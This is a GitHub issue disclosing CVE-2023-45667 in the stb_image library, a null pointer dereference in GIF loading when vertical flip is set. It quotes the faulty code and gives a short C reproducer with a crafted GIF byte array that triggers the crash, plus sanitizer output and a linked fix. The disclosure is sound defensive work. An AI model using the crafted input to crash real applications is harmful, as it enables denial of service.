Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Null pointer dereference because of an uninitialized variable (GHSL-2023-151/CVE-2023-45667) #1550

Open
JarLob opened this issue Oct 19, 2023 · 0 comments · May be fixed by #1551
Open

Null pointer dereference because of an uninitialized variable (GHSL-2023-151/CVE-2023-45667) #1550

JarLob opened this issue Oct 19, 2023 · 0 comments · May be fixed by #1551

Comments

@JarLob
Copy link

JarLob commented Oct 19, 2023

If stbi__load_gif_main in stbi_load_gif_from_memory [1] fails it returns a null pointer and may keep the z variable uninitialized. In case the caller also sets the flip vertically flag [2], it continues and calls stbi__vertical_flip_slices [3] with the null pointer result value and the uninitialized z value.

STBIDEF stbi_uc *stbi_load_gif_from_memory(stbi_uc const *buffer, int len, int **delays, int *x, int *y, int *z, int *comp, int req_comp)
{
   unsigned char *result;
   stbi__context s;
   stbi__start_mem(&s,buffer,len);

   result = (unsigned char*) stbi__load_gif_main(&s, delays, x, y, z, comp, req_comp); // [1]
   if (stbi__vertically_flip_on_load) { // [2]
      stbi__vertical_flip_slices( result, *x, *y, *z, *comp ); // [3]
   }

   return result;
}

It depends on the value of z [4] if the program enters the loop and attempts to dereference the null pointer value in stbi__vertical_flip [5].

static void stbi__vertical_flip_slices(void *image, int w, int h, int z, int bytes_per_pixel)
{
   int slice;
   int slice_size = w * h * bytes_per_pixel;

   stbi_uc *bytes = (stbi_uc *)image;
   for (slice = 0; slice < z; ++slice) { // [4]
      stbi__vertical_flip(bytes, w, h, bytes_per_pixel); // [5]
      bytes += slice_size;
   }
}

Impact

This issue may lead to denial of service.

Resources

To reproduce the issue in stbi__vertical_flip_slices:

  1. Make MSAN build of the following program:
#include <stdint.h>
#define STB_IMAGE_IMPLEMENTATION
#include "../stb_image.h"

int main(int argc, char* argv[])
{
    const uint8_t data[] = {0x47,0x49,0x38,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x35,0xff};
    size_t size = sizeof(data);

    stbi_set_flip_vertically_on_load(1);
    int x, y, z, channels;
    stbi_uc *img = stbi_load_gif_from_memory(data, size, NULL, &x, &y, &z, &channels, 4);
    stbi_image_free(img);
    return 0;
}
  1. Set breakpoint at line 1251 in stbi__vertical_flip_slices and run the program to hit the usage of the uninitialized memory.
==292219==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x4b0ad6 in stbi__vertical_flip_slices(void*, int, int, int, int) tests/../stb_image.h:1251:4
    #1 0x4ad19e in stbi_load_gif_from_memory tests/../stb_image.h:1450:7
JarLob added a commit to JarLob/stb that referenced this issue Oct 19, 2023
@JarLob
Fix Null pointer dereference because of an uninitialized variable
8dc9fff 
Call `stbi__vertical_flip_slices` only if the previous function didn't fail. Fixes nothings#1550
@JarLob JarLob linked a pull request Oct 19, 2023 that will close this issue
Open
@shinohara-rin shinohara-rin mentioned this issue Oct 30, 2023
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix Null pointer dereference because of an uninitialized variable JarLob/stb
1 participant
@JarLob